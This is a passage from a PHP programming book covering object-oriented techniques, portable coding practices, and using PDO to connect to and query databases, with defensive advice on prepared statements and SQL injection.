  • 45. Introduction 21 HTMLImage.class.php (excerpt) <?php class HTMLImage extends HTMLElement { ⋮ the usual properties and constructor function public function getSource() { return '<'. $this->tagname . $this->getAttributeSource() .' />'; } Overriding a Method? Watch your Arguments! When a child class overrides a method, PHP prefers (though it doesn’t require) the child class method to have the same number of arguments as the parent class method. If the number of arguments differs between the child and parent class versions of the method, your code will remain perfectly legal in terms of object oriented programming, and it’ll still run perfectly. However, it will cause an E_STRICT error to appear if E_STRICT warnings are enabled in php.ini.20 You can also have the child class make use of the parent class’s method or property internally, even while overriding it. To ensure our classes produce quality HTML I want to make sure all image elements have an alt attribute, even if it’s only to alert the developer that it’s missing. We’ll override the getAttributeSource method: HTMLImage.class.php (excerpt) public function getAttributeSource() { if (!array_key_exists('alt',$this->attributes)) { $this->attributes['alt'] = 'This image needs alt text'; } return parent::getAttributeSource(); } } ?> 20 E_STRICT warnings are defined by The PHP Manual as “Run-time notices. Enable [these notices] to have PHP suggest changes … which will ensure the best interoperability and forward-compatib­ ility of your code.” [http://www.php.net/errorfunc/]
  • 46. 22 The PHP Anthology We can use the parent keyword and the :: operator to call the parent class’s method. This trick saves us from duplicating functionality already contained in the parent class. Note that we can call the parent class by name to achieve exactly the same result. For example, the above parent method call could have also been written like this: return HTMLElement::getAttributeSource(); Here, we’ve replaced the parent keyword with the name of the HTMLElement class. Although the output is exactly the same, using parent saves us from having to re­ member the name of the parent class while working in the child, and is the recom­ mended syntax.21 Overriding Constructors Most object-oriented languages—Java, for example—will run the constructor of a given parent class automatically, before running an overriding constructor in a child class. This behavior is known as cascading constructors. PHP doesn’t have this feature. If you create a constructor in a child class in PHP, be aware that you’re completely overriding the parent class’s constructor. You must call that constructor explicitly from your new constructor, for example, using parent::__construct(), if you want the parent class to handle its share of the object’s initialization. We can see overriding in action in this example: overriding.php (excerpt) <?php require 'HTMLImage.class.php'; $logo = new HTMLImage('', array( 'id' => 'logo', 'src' => 'php.gif' ) 21 PHP’s double colon operator (::) is called the scope resolution operator, or Paamayim Nekudotayim. This may seem like a strange choice for naming a double-colon, but while writing the Zend Engine 0.5 (which powers PHP 3), that’s what the Zend team decided to call it. It actually does mean double- colon—in Hebrew!
  • 47. Introduction 23 ); echo $logo; ?> The above code will output the following: <img id="logo" src="php.gif" alt="This image needs alt text" /> If you examine the output, you can see that the HTMLImage->getAttributeSource method has outputted the appropriate attributes as per our intention. Object Aggregation and Composition In addition to inheritance, objects can interact in other ways; for example, one object can use another object to perform a function either by creating the object to be used to perform the function or by receiving it through a method’s arguments. Such in­ teractions demonstrate the expressive power of the object oriented paradigm. There are two ways in which one object can use another: aggregation and composi­ tion. Aggregation Aggregation occurs when one object is given another object on a “temporary loan.” The second object will usually be passed to the first through one of the first object’s methods—for instance, the constructor. The first object is then able to call methods in the second, which means it can use the functionality stored in the second object for its own purposes. Let’s look at an example of aggregation in action. We’ll build an HTMLUnorderedList class that can hold an array of HTMLListItem objects. The HTMLListItem class is a simple extension of the parent HTMLElement class: HTMLListItem.class.php (excerpt) <?php require_once 'HTMLElement.class.php'; class HTMLListItem extends HTMLElement { protected $tagname = 'li';
  • 48. 24 The PHP Anthology public function __construct($content, $attributes = array()) { parent::__construct($content, $attributes); } } ?> The HTMLUnorderedList class, however, has a new property and method: HTMLUnorderdList.class.php (excerpt) <?php require_once 'HTMLListItem.class.php'; class HTMLUnorderedList extends HTMLElement { ⋮ other properties… private $items = array(); ⋮ constructor method… public function addListItem(HTMLListItem $item) { $this->items[] = $item; } public function getSource() { if (count($this->items)) { $this->content = ''; foreach ($this->items as $item) { $this->content .= $item->getSource(); } } return parent::getSource(); } } ?> The addListItem method takes an HTMLListItem object as an argument and adds it to the array of list items stored in the $items property. The getSource method
  • 49. Introduction 25 has also been overridden to be able to construct the HTML list element using the list items. Type Hinting Demystified As you can see, I used type hinting in the addListItem method. A type hint is a specification that an argument for a method must be an object of a specified class. If the script doesn’t pass the constructor an object of the specified type, it will cause a fatal error (or, as of PHP 5.2, a recoverable error) to be raised. In the example function addListItem(HTMLListItem $item) will require the script to pass the constructor an HTMLListItem object. Type hinting can also be applied to object interfaces, which we discuss in the section called “Object Interfaces”. The convention in PHP programming is, in fact, to only type hint interfaces, not concrete class implementations. However, we can be forgiven for doing so in our simple OOP introduction. Composition Composition describes the style of object oriented programming where one object completely owns another object—that is, the first object was responsible for instan­ tiating the second object. There are many cases in which composition can be useful, although it’s most commonly used when it’s likely that the first object will be the only one that needs to use the second. For example, let’s create a class to represent a web site logo graphic. We want the class to be able to output the HTML for the logo image, and to do that, it uses our HTMLImage class like so: WebsiteLogo.class.php (excerpt) <?php require_once 'HTMLImage.class.php'; class WebsiteLogo { private $img; public function __construct($imagesrc, $title, $alt) { $this->img = new HTMLImage('',array('src' => $imagesrc, 'title' => $title, 'alt' => $alt, 'class' => 'sitelogo'));
  • 50. 26 The PHP Anthology } public function getSource() { return $this->img->getSource(); } public function __toString() { return $this->getSource(); } } ?> Since the HTMLImage class already knows how to write the HTML for the image tag, we can use an instance of HTMLImage and just supply the correct image source, title, and alternative text for our web site logo graphic. We are also able to enforce the output of a specific class name in our web site logo <img> tag. When the WebsiteLogo->getSource method is called, it just calls the getSource method for the HTMLImage object. Using Aggregation and Composition: Benefits and Pitfalls In terms of practical development, it’s important to know when to apply aggregation or composition. How can you tell when object A should aggregate or compose object B? Ask yourself, “What happens if object A dies? Will object B still be alive?” If object B is required to outlive the death of object A, object A should aggregate object B. But if it’s better that object B dies when object A dies, then object A should compose object B. Aggregation offers the advantage of lower overhead than composition, because a single object will be shared by many other objects. It’s certainly a good idea to ag­ gregate your database connection class; composing it with every object that wants to make a query may result in multiple connections to your database, which will cause your application to grind to a halt whenever it attracts high levels of traffic. Composition makes classes easier to work with because they’re self-contained. The code that uses the class doesn’t have to worry about passing it the other objects it needs, which, in a complex application, can often become so tricky as to require us to develop a design workaround. Another advantage of composition is that, when
  • 51. Introduction 27 working with code that uses it, we know exactly which class has access to the composed object. One of the problems with aggregation is that an object which shares the aggregated object may do something to its state that makes the object unusable by the other classes that are supposed to be able to use it. Composition produces tighter coupling—that is, greater dependency—between the two objects involved, making it more difficult to reuse one without the other. Polymorphism Another powerful aspect of object oriented programming is polymorphism—the ability of different objects to share an interface and thus become interchangeable. An interface is the name given to one or more methods that let you use a class for a particular purpose. For example, imagine you have two database connection classes—one for MySQL, and one for PostgreSQL. As long as both of them offered a query method, you could use them interchangeably for running queries on different databases—of course, your SQL would have to be valid in both databases. In this case, the query method would represent a simple interface that the two classes shared. Classes sharing the same interface are often inherited from a parent class that makes the common methods available, or implements a common interface. This concept is best illustrated by the following examples. Abstract Classes and Methods Our parent class, HTMLElement contains all the common functionality for all our child classes. However, we don’t really want to be able to instantiate an object from the HTMLElement class—it has no tag name information and wouldn’t output any useful HTML. So we use the abstract keyword to make this an abstract base class, which provides an outline of the minimum functionality required for an HTMLElement object: the common getSource and getAttributeSource methods. We extend the HTMLElement class to define concrete child classes, each of which creates a specific approach to building an HTML element:
  • 52. 28 The PHP Anthology AbstractHTMLElement.class.php (excerpt) <?php abstract class HTMLElement { ⋮ common properties and methods… } ?> The terms abstract and concrete refer to class usage—in particular, whether a class is intended to be used directly or not. An abstract class is one that has some functionality or structure that’s to be shared by all subclasses, though the class itself can’t be used directly. In other words, we’re not supposed to create objects from an abstract class. If we try to do so, we’ll raise a fatal error. A concrete class is a subclass of the abstract class from which we can create objects. There are more ways to use the abstract keyword than just at the class level. Typically, an abstract class also has one or more empty methods that don’t do any­ thing other than demand that given child classes implement them. For example, we could add a hypothetical method called addContent; we only include the method name and parameters: AbstractHTMLElement.class.php (excerpt) <?php abstract class HTMLElement { ⋮ common properties and methods… abstract public function addContent(HTMLElement $element); } ?> Defining abstract method in this way allows the author of the abstract class to indic­ ate the intention of the class without dictating the implementation. In this example the abstract addContent method must accept a single argument containing a HTMLElement object. The inclusion of this abstract method makes it compulsory for any child classes to implement the method. While the intention of this abstract method may be to force any HTMLElement object to add a child HTML element to
  • 53. Introduction 29 its inner content, each HTML element achieves this in different ways. For example, some HTML elements can only contain child elements of a certain type; others can’t contain any child elements at all. If you’re curious to learn some more about abstrac­ tion, check out the manual page.22 Object Interfaces An object interface is the equivalent of an agreement to implement certain methods. It differs from an abstract class in that it contains no implementation at all. Interfaces are defined by the interface keyword; they’re written in the same way as classes, except that the methods have no contents at all. Here’s an example of an interface: HTMLSource.interface.php (excerpt) <?php interface HTMLSource { public function getSource(); } ?> This is a very simple interface but it’ll do for an example. Here, we’ve defined one method: getSource. Any class that implements this interface must implement this method; failure to do so will raise a fatal error. As the intention of interfaces is to define a public interface, all methods must be declared public. Our intention with the interface above is to indicate which objects can output an HTML source string. To indicate that a class implements a specific interface, you use the implements keyword. Here’s an example of this usage in a modification of our previously defined WebsiteLogo class: WebsiteLogo2.class.php (excerpt) <?php require_once 'HTMLImage.class.php'; require_once 'HTMLSource.interface.php'; class WebsiteLogo implements HTMLSource { 22 http://www.php.net/manual/en/language.oop5.abstract.php
  • 54. 30 The PHP Anthology ⋮ class properties and methods… public function getSource() { return $this->img->getSource(); } } ?> You may be wondering, “So what’s the big deal?” Well, let’s finish off our explana­ tion of object interfaces by examining a situation where interfaces will come in handy. Let’s say for the purposes of this demonstration that the abstract HTMLElement class also implements the HTMLSource interface. It already does so by virtue of the fact that it has a method called getSource, but indicating the fact in code allows us to test it for sure. We’d indicate the implementation like this: AbstractHTMLElement2.class.php (excerpt) <?php require_once 'HTMLSource.interface.php'; abstract class HTMLElement implements HTMLSource { ⋮ common properties and methods… } ?> To make use of this new feature of our codebase, let’s change the base class imple­ mentation of the getSource method: AbstractHTMLElement2.class.php (excerpt) public function getSource() { if ($this->content instanceof HTMLSource) { $html = $this->content->getSource(); } else { $html = $this->content; }
  • 55. Introduction 31 return '<' . $this->tagname . $this->getAttributeSource() . '>' . $html . '</' . $this->tagname . '>'; } With this modified function, any object based on the HTMLElement class can now have as its content any object that implements the HTMLSource interface. This could be an object based on any one of our HTMLElement classes previously defined, or even an object based on the WebsiteLogo class. When getSource is called, the in­ stanceof type operator is used to check the type of the content property—if it’s an object that implements the interface, we call its getSource method; otherwise, we assume it’s a string value and use that. The operator allows us to check that an object implements the interface, allowing us to make use of it without having to know exactly what kind of object it is.23 Static Properties and Methods Static properties and methods are different than object properties and methods in the way that they allow a property or method to be accessed without the instantiation of an object. This feature is particularly handy at times when you want to use a method of a class without having to instantiate an object to do so. Let’s take a closer look at how static properties work. Since having to type in new HTMLParagraph(…) whenever we wish to create a paragraph is slightly tedious, we’ll want to make it easier. Let’s make a class called HTML—which we can use without having to instantiate any objects—to create our objects for us.24 We use the static keyword to indicate that the methods are static: 23 You can read more about interfaces here: http://www.php.net/manual/en/language.oop5.interfaces.php and more about the instanceof operator here: http://www.php.net/manual/en/language.operators.type.php 24 This is an example of the Factory design pattern. Read more about patterns on the manual page at http://www.php.net/manual/en/language.oop5.patterns.php.
  • 56. 32 The PHP Anthology HTML.class.php <?php require_once 'HTMLParagraph.class.php'; class HTML { public static function p($content, $attributes = array()) { return new HTMLParagraph($content, $attributes); } } ?> Here’s an example of how the HTML class could be used: echo HTML::p('This is a static method!'); This example would output as follows: <p>This is a static method!</p> Notice that when we use a static method, we use the :: operator, rather than the object -> operator, to access the method. You may have noticed that this is the same operator used to call a method of the parent class of the current object, as in parent::method(). The parent class usage is a special case where inheritance is concerned, as the parent class method retains access to the object’s instance data, and therefore isn’t static. $this Can’t be Used in Static Methods As static methods are used without the instantiation of an object, the $this variable can’t be used in static methods. Now to extend this example a bit—and possibly to excite your interest in OOP in PHP 5 into the bargain—imagine for a moment that we’ve added a static method and a corresponding class for each possible HTML element to our HTML class. Re­ membering that one HTMLElement object can be passed to the constructor of another HTMLElement object as its content, we can now create methods for all HTML elements that we can use as demonstrated in the following example:
  • 57. Introduction 33 echo HTML::div(HTML::h1('Welcome to my web site!'), array('id' => 'header')); This example would output the following HTML: <div id="header"><h1>Welcome to my web site!</h1></div> Taking the above example as your goal, I’ll leave the implementation of such an API up to you. Come on—with this introduction to OOP under your belt, it should be easy! How do I write portable PHP code? Not all PHP installations are the same. Depending on version and configuration settings in your php.ini file, your script may or may not run correctly on another server on which PHP is installed. However, you should consider adopting a number of generally accepted best practices to make life easier and minimize the need to rewrite code for other servers. Solution The list of generally accepted best practices include, keeping your configuration central, writing your code to be reusable, always using the full PHP tags, always using supergobal variables and never using register_globals and always checking for magic quotes. Keeping Configuration Central For most PHP applications, it will be necessary to write configuration information describing the environment in which the script will run, including database user- names and passwords, directory locations, and so on. As a general rule, try to keep the majority of this information in a single place—maybe even a single file—so that when you need to modify the information, you can make all the necessary changes in one place. That said, when you’re building modular applications, you may want to store local elements of the configuration to a specific module within the module itself, rather than in a central location. The way each of us chooses to store this information is a matter of personal choice. In some cases, it may be worth considering the use of an XML file, or storing some
  • 58. 34 The PHP Anthology of the information in a database. It’s also worth being aware of the parse_ini_file function.25 A simple but effective storage mechanism is to place all the settings into a single file as PHP constants, which makes them available from any function or class in your application. Here’s an example: <?php // Configuration settings define('DOMAIN', 'sitepoint.com'); // In another script echo 'The domain is ' . DOMAIN; ?> Constants need to be used with caution, though. In order for your functions and classes to be reusable in other applications, they shouldn’t depend on constants of a fixed name; rather, they should accept configuration information as arguments—an approach that will allow for greater code reuse. In such cases, it’s best to use PHP variables in your central configuration file, which you can then pass to functions and classes as required. For example, when we’re connecting to database, we can identify a number of variables that we need to have stored in a central location: the server hostname, the username, and the password. We can use the require_once function to create a file called, for instance, config.php, and place it outside the public web directories. This approach helps to ensure that users don’t accidentally browse to the file con­ taining this critical information—a situation that would place the site’s security at risk. Recycling and Reuse It’s easy to say, but if you find yourself writing any more than one PHP script in your life, you need to start thinking about ways to make your code reusable before you suffer premature hair loss! If you end up working on other sites or applications, you’ll appreciate having ready code that you can simply plug into your new project. Also, if you’re writing code 25 http://www.php.net/manual/en/function.parse-ini-file.php
  • 59. Introduction 35 that other people will integrate with existing applications on their web sites, you need to package it in a form that doesn’t place requirements on the code they’re already using. For example, if your application has some kind of user authentication system, you’ll want to ask yourself if it can be integrated with the systems that site owners are already using—systems with which large databases of users are likely already associated. The best approach is to write object oriented code with a mind to creating reusable components, or pieces of functionality. Some people argue that creating PHP applic­ ations using object oriented code results in slower-running applications and should be avoided at all costs. What they forget to mention is that object oriented program­ ming delivers a drastic increase in your code’s performance. After all, fast program­ mers cost more than fast microprocessors! A number of important points must be considered when you’re measuring the po­ tential of your code for reuse: ■ What happens when the project’s requirements change? ■ How easy is it to add new features to your code? ■ Are you still able to understand the code after a long period of time? ■ Can your code be integrated easily with other applications? ■ Will the assumptions you’ve made in your code apply to your work on other sites? This book will provide many hints and suggestions to help you to write reusable code, although an in-depth analysis of PHP applications design as a whole is beyond its scope. As you read this book, you should be able to identify some of the critical factors as subjects for further investigation. You have one main responsibility to yourself as an experienced PHP developer: to keep expanding your knowledge of the more esoteric aspects of software development, such as design patterns and enterprise application architecture, as a means to improve your development tech­ nique and, more importantly, save yourself time. The broader your knowledge, the lower the risk of failure when you land the next big project. Portability Essentials Here are three steps you should take to ensure the portability of your PHP code.
  • 60. 36 The PHP Anthology Using the Full <?php ?> Tags PHP supports a variety of tag styles to mark up sections of your code, including the short tags (<? ?>), and ASP-style tags (<% %>). Tag style support is controlled from php.ini with the settings short_open_tag and asp_tags. Be aware, though, that while you may have these settings switched on, other server administrators may not, which can be problematic. The short tag style, for example, causes issues when the PHP is mixed with XML documents that use processing instructions like this: <?xml version="1.0"?> If you have a document that contains PHP and XML, and you have the short_open_tag setting turned on, PHP will mistake the XML processing instruction <?xml for a PHP opening tag. It’s possible that your code will need to run in environments where short_open_tags and asp_tags are both turned off. The best way to ensure that these settings are disabled is to get into the habit of always using the <?php ?> tag style—otherwise, you may have a lot of code rewriting to do in the future. Turning register_globals Off Make sure the following code is in place in your php.ini file: register_globals = off This will force you to access incoming data via the special predefined superglobal variables (e.g. $_GET['username']), ensuring there won’t be a conflict with variables you’ve created in your script. The same result can be achieved by placing the following code in your Apache .htaccess file: php_flag register_globals off Further information can be found in The PHP Manual,26 and in Kevin Yank’s article, Write Secure Scripts with PHP 4.2! on SitePoint.27 26 http://www.php.net/manual/en/security.globals.php 27 http://www.sitepoint.com/article/write-secure-scripts-php-4-2/
  • 61. Introduction 37 Checking for Magic Quotes Magic quotes is a feature of PHP that’s intended to help prevent security breaches in sites developed by PHP beginners. The magic quotes feature adds escape characters —backslashes that indicate that quotation marks should be included in the string, rather than marking the end of the string—to incoming URL query strings, form posts, and cookie data automatically, before your script is able to access any of these values. Should you insert the data directly into your database, there’s no risk that a malicious user might be able to tamper with the database provided magic quotes functionality is switched on. For beginners, this is certainly a useful way to prevent disasters. However, once you understand what SQL injection attacks are, and have developed the habit of writing code to avoid them,28 the magic quotes functionality can become more of a problem than it’s worth. Magic quotes functionality is controlled by a PHP configuration setting magic_quotes_gpc , which can be set to be either on or off. My own preference is always to have magic quotes switched off, and to deal with the task of escaping data for SQL statements myself. Unfortunately, this means that the code I write won’t port well to PHP installations where magic quotes is switched on—I’ll end up with backslashes in my content. Thankfully, to deal with this problem, PHP provides the function get_magic_quotes_gpc , which can be used to find out whether the magic quotes functionality is switched on. To keep the code in this book portable, we’ll use a simple file that strips out magic quotes, should this functionality be enabled: 28 See “How do I protect my web site from an SQL injection attack?” in Chapter 2 for more on SQL in­ jection attacks.
  • 62. 38 The PHP Anthology <?php /** * Checks for magic_quotes_gpc = On and strips them from incoming * requests if necessary */ if (get_magic_quotes_gpc()) { $_GET = array_map('stripslashes', $_GET); $_POST = array_map('stripslashes', $_POST); $_COOKIE = array_map('stripslashes', $_COOKIE); } ?> If we include this code at the start of any file in which we accept data from a query string, a form post, or a cookie, we’ll remove any slashes added by magic quotes, should this functionality be switched on. Summary Are you ready to jump in and try the PHP 5 waters? This chapter has showed you how to keep your head up and tread water. You may not be a professional swimmer yet, but with The PHP Manual by your side—as well as this book—we’ll keep you afloat, introduce you to some of the beauty of the PHP ocean, and eventually show you how to glide through the waters with grace!
  • 63. 2 Chapter Using Databases with PDO In the “old days” of the Internet, most web pages were nothing more than text files containing HTML. When people visited your site, your web server simply made the file available to their browsers. This approach started out fine, but as web sites grew, and issues such as design and navigation became more important, developers found that maintaining consistency across hundreds of HTML files was becoming a massive headache. To solve this problem, it became popular to separate variable content (articles, news items, and so on) from the static elements of the site—its design and layout. If a database is used as a repository to store variable content, a server-side language such as PHP performs the task of fetching that data and placing it within a uniform layout template. This means that modifying the look and feel of a site can be handled as a separate task from the maintenance of content. And maintaining consistency across all the pages in a web site no longer consumes a developer’s every waking hour. PHP supports all the relational databases worth mentioning, including those that are commonly used in large companies: Oracle, IBM’s DB2, and Microsoft’s SQL Server, to name a few. The three most noteworthy open source alternatives are
  • 64. 40 The PHP Anthology SQLite, PostgreSQL, and MySQL. PostgreSQL is arguably the best database of the three, in that it supports more of the features that are common to relational databases. SQLite is the perfect choice for smaller applications that still require database cap­ ability. MySQL is a popular choice among web hosts that provide support for PHP, and for this reason is typically easier to find than PostgreSQL. This chapter covers all the common operations that PHP developers perform when working with databases: retrieving and modifying data, and searching and backing up the database. To achieve these tasks, we’ll use the built-in PDO extension, rather than database-specific extensions. The examples we’ll work with will use a single table, so no discussion is made of table relationships here. For a full discussion of that topic, see Kevin Yank’s Build Your Own Database Driven Website Using PHP & MySQL, 3rd Edition (SitePoint, Melbourne, 2006)1. The examples included here work with the MySQL sample database called “world,” though all the interactions we’ll work through can be undertaken with any database supported by PDO. The SQL file for the world database is available at http://dev.mysql.com/doc/#sampledb and the instructions explaining its use can be found at http://dev.mysql.com/doc/world-setup/en/world-setup.html. What is PDO? PDO, the PHP Data Objects extension, is a data-access abstraction layer. But what the heck is that? Basically, it’s a consistent interface for multiple databases. No longer will you have to use the mysql_* functions, the sqlite_* functions, or the pg_* functions, or write wrappers for them to work with your database. Instead, you can simply use the PDO interface to work with all three functions using the same methods. And, if you change databases, you’ll only have to change the DSN (or Data Source Name) of the PDO to make your code work.2 PDO uses specific database drivers to interact with various databases, so you can’t use PDO by itself. You’ll need to enable the drivers you’ll use with PDO, so be sure 1 http://www.sitepoint.com/books/phpmysql1/ 2 That’s all you’ll have to do so long as you write your SQL in a way that’s not database specific. If you try to stick to the ANSI 92 standard [http://www.contrib.andrew.cmu.edu/~shadow/sql/sql1992.txt], you should generally be okay—most databases support that syntax.
  • 65. Using Databases with PDO 41 to research how to do it for your specific host operating system on the PDO manual page.3 PDO is shipped with PHP 5.1 and is available from PECL for PHP 5.0. Unfortunately, as PDO requires the new PHP 5 object oriented features, it’s not available for PHP 4. In this book, all of our interactions with the database will use PDO to interact with the MySQL back end. How do I access a database? Before we can do anything with a database, we need to talk to it. And to talk to it, we must make a database connection. Logical, isn’t it? Solution Here’s how we connect to a MySQL database on the localhost: mysqlConnect.php (excerpt) <?php $dsn = 'mysql:host=localhost;dbname=world;'; $user = 'user'; $password = 'secret'; try { $dbh = new PDO($dsn, $user, $password); } catch (PDOException $e) { echo 'Connection failed: ' . $e->getMessage(); } ?> We’d use this code to connect to a SQLite database on the localhost: 3 http://www.php.net/pdo/
  • 66. 42 The PHP Anthology sqliteConnect.php (excerpt) <?php $dsn = 'sqlite2:"C:sqliteworld.db"'; try { $dbh = new PDO($dsn); } catch (PDOException $e) { echo 'Connection failed: ' . $e->getMessage(); } ?> And this code will let us connect to a PostgreSQL database on the localhost: postgreConnect.php (excerpt) <?php $dsn = 'pgsql:host=localhost port=5432 dbname=world user=user '; $dsn .= 'password=secret'; try { $dbh = new PDO($dsn); } catch (PDOException $e) { echo 'Connection failed: ' . $e->getMessage(); } ?> Discussion Notice that in all three examples above, we simply create a new PDO object. Only the connection data for the PDO constructor differs in each case: for the SQLite and PostgreSQL connections, we need just the DSN; the MySQL connection also requires username and password arguments in order to connect to the database.4 4 We could have put the username and password information in the MySQL DSN, providing a full DSN, but the average user has no cause to do this when using MySQL. It just adds unnecessary complexity to the DSN.
  • 67. Using Databases with PDO 43 The DSN in Detail As we saw above, DSN is an acronym for Data Source Name. The DSN provides the information we need in order to connect to a database. The DSN for PDO has three basic parts: the PDO driver name (such as mysql, sqlite, or pgsql), a colon, and the driver-specific syntax. The only aspect that may be a bit confusing here is the driver-specific syntax, as each driver requires different information. But have no fear—the trusty manual is here, of course! The manual describes the database driver-specific syntax that’s required in the DSN for each of the PDO drivers. All you need to do is to go to the database driver page,5 select your database driver, and follow the link to the DSN information. For example, the MySQL DSN page in the manual is found at http://www.php.net/manual/en/ref.pdo-mysql.connection.php; it’s shown in Fig­ ure 2.1. Figure 2.1. The PDO_MySQL DSN manual page 5 http://www.php.net/manual/en/ref.pdo.php#pdo.drivers
  • 68. 44 The PHP Anthology DSN examples are also provided on each manual page to get you started. Do Not Pass Credentials in the DSN In the database connection examples we just saw, I included my access credentials within the DSN, or in the $user and $pass variables, but I did so for illustration purposes only. This is not standard—or appropriate—practice, since this inform­ ation can by misused by malicious parties to access your database. Other Concepts There are several concepts that you should understand when working with a data­ base. First, you need to remember that the database server is a completely separate entity from PHP. While in these examples the database server and the web server are the same machine, this is not always the case. So, if your database is on a different machine from your PHP, you’ll need to change the host name in the DSN to point to it. To make things more interesting, database servers only listen for your connection on a specific port number. Each database server has a default port number (MySQL’s is 3306, PostgreSQL’s is 5432), but that may not be the port that the database admin­ istrator chose to set, or the one that PHP knows to look at. When in doubt, include your port number in the DSN. You also need to be aware that a database server can have more than one database on it, so yours may not be the only one. This is why the database name is commonly included in the DSN—to help you get to your data, not some other person’s! Finally, make sure you understand what you’ll receive from your PDO connection. Your connection will return a PDO object—not a reference to the database, or any data. It is through the PDO object that we interact with the database, bending it to our will. How do I fetch data from a table? Here we are, connected to the database. Woo hoo! But what good is that if we can’t get anything out of the database?
  • 69. Using Databases with PDO 45 Solutions PDO provides a couple of ways for us to interact with the database. Here, we’ll ex­ plore both possible solutions. Using the Query Method First, let’s look at the faster, but not necessarily better, way—using the query method: pdoQuery.php (excerpt) $country = 'USA'; try { $dbh = new PDO($dsn, $user, $password); $dbh->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION); $sql = 'Select * from city where CountryCode =' . $dbh->quote($country); foreach ($dbh->query($sql) as $row) { print $row['Name'] . "t"; print $row['CountryCode'] . "t"; print $row['Population'] . "n"; } } catch (PDOException $e) { echo 'PDO Exception Caught. '; echo 'Error with the database: <br />'; echo 'SQL Query: ', $sql; echo 'Error: ' . $e->getMessage(); } An excerpt of this code’s output can be seen in Figure 2.2.
  • 70. 46 The PHP Anthology Figure 2.2. Output produced using the PDO query method Using the Prepare and Execute Methods Using the prepare and execute methods is generally considered the better way to handle a query to the database. First, we call PDO->prepare with our SQL statement as an argument. In return, we receive a PDOStatement object, on which we call the execute method. Then, within a while loop, we repeatedly call the PDOStatement->fetch method to retrieve the data we’ve selected from our database: pdoPrepEx.php (excerpt) $country = 'USA'; try { $dbh = new PDO($dsn, $user, $password); $sql = 'Select * from city where CountryCode =:country'; $dbh->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION); $stmt = $dbh->prepare($sql); $stmt->bindParam(':country', $country, PDO::PARAM_STR);
  • 71. Using Databases with PDO 47 $stmt->execute(); while ($row = $stmt->fetch(PDO::FETCH_ASSOC)) { print $row['Name'] . "t"; print $row['CountryCode'] . "t"; print $row['Population'] . "n"; } } catch (PDOException $e) { echo 'PDO Exception Caught. '; echo 'Error with the database: <br />'; echo 'SQL Query: ', $sql; echo 'Error: ' . $e->getMessage(); } An excerpt of the output of this code can be seen in Figure 2.3. Figure 2.3. Output using the PDO prepare and execute methods
  • 72. 48 The PHP Anthology Discussion You’ll have noticed that both these solutions give you the same data, which is as it should be. But there are very specific reasons for choosing one solution over the other. PDO->query is great when you’re only executing a query once. While it doesn’t automatically escape any data you send it, it does have the very handy ability to iterate over the result set of a successful SELECT statement. However, you should take care when using this method. If you don’t fetch all the data in the result set, your next call to PDO->query might fail.6 If you’re going to use the SQL statement more than once, your best bet is to use prepare and execute—the preferred solution. Using prepare and execute has a couple of advantages over query. First, it will help to prevent SQL injection attacks by automatically escaping any argument you give it (this approach is often considered the better practice for this reason alone). Granted, if you build any other part of your query from user input, that will negate this advantage, but you wouldn’t ever do that, would you? Second, prepared state­ ments that are used multiple times (for example, to perform multiple inserts or updates to a database) use fewer resources and will run faster than repeated calls to the query method. There are a couple of other ways we can use prepare and execute on a query, but I feel that the example we discussed here will be the clearest. I used named para­ meters in this solution, but be aware that PDO also supports question mark (?) parameter markers. In the example we saw here, you could have chosen not to use the paramBind method—instead, you could have given the parameters to the execute command. See The PHP Manual if you have any questions about the alternative syntaxes. Using Fetch Choices When you use prepare and execute, you have the choice of a number of formats in which data can be returned. The example we saw used the PDO::FETCH_ASSOC 6 For further information, see The PHP Manual page at http://www.php.net/manual/en/function.PDO-query.php.
  • 73. Using Databases with PDO 49 option with the fetch method, because it returns data in a format that will be very familiar for PHP4 users: an associative array.7 If you’d rather use only object-oriented code in your application, you could instead employ the fetchObject method, which, as the name implies, returns the result set as an object. Here’s how the while loop will look when the fetchObject method is used: pdoPrepEx2.php (excerpt) while ($row = $stmt->fetchObject()) { print $row->Name . "t"; print $row->CountryCode . "t"; print $row->Population . "n"; } How do I resolve errors in my SQL queries? Errors are inevitable. They assail all of us and can, at times, be caused by circum­ stances outside our control—database crashes, database upgrades, downtime for maintenance, and so on. If something goes wrong when you’re trying to deal with PHP and SQL together, it’s often difficult to find the cause. The trick is to get PHP to tell you where the problem is, bearing in mind that you must be able to hide this information from visitors when the site goes live. We’re Only Looking for Errors—Not Fixing Them! I won’t be explaining error handling in depth here—instead, I’ll show you how to find errors. See Chapter 9 for more information on what to do when you’ve found an error and want to fix it. Solutions PDO provides multiple solutions for catching errors. We’ll go over all three options in the following examples, where we’ll introduce a typo into the world database 7 For a full listing of the ways in which you can have data returned, see the fetch page of the manual at http://www.php.net/manual/en/function.pdostatement-fetch.php.
  • 74. 50 The PHP Anthology table name, so that it reads cities instead of city. If you run this code yourself, you can also try commenting out the error-handling code to see what may be dis­ played to site visitors. Using Silent Mode PDO::ERRMODE_SILENT is the default mode: pdoError1.php (excerpt) $country = 'USA'; $dbh = new PDO($dsn, $user, $password); $sql = 'Select * from cities where CountryCode =:country'; $stmt = $dbh->prepare($sql); $stmt->bindParam(':country', $country, PDO::PARAM_STR); $stmt->execute(); $code = $stmt->errorCode(); if (empty($code)) { ⋮ proceed to fetch data } else { echo 'Error with the database: <br />'; echo 'SQL Query: ', $sql; echo '<pre>'; var_dump($stmt->errorInfo()); echo '</pre>'; } The default error mode sets the errorCode property of the PDOStatement object, but does nothing else. As you can see in this example, you need to check the error code manually to ascertain whether or not an error was found—otherwise your script will happily continue on its merry way. Using Warning Mode PDO::ERRMODE_WARNING generates a PHP warning as well as setting the errorCode property:
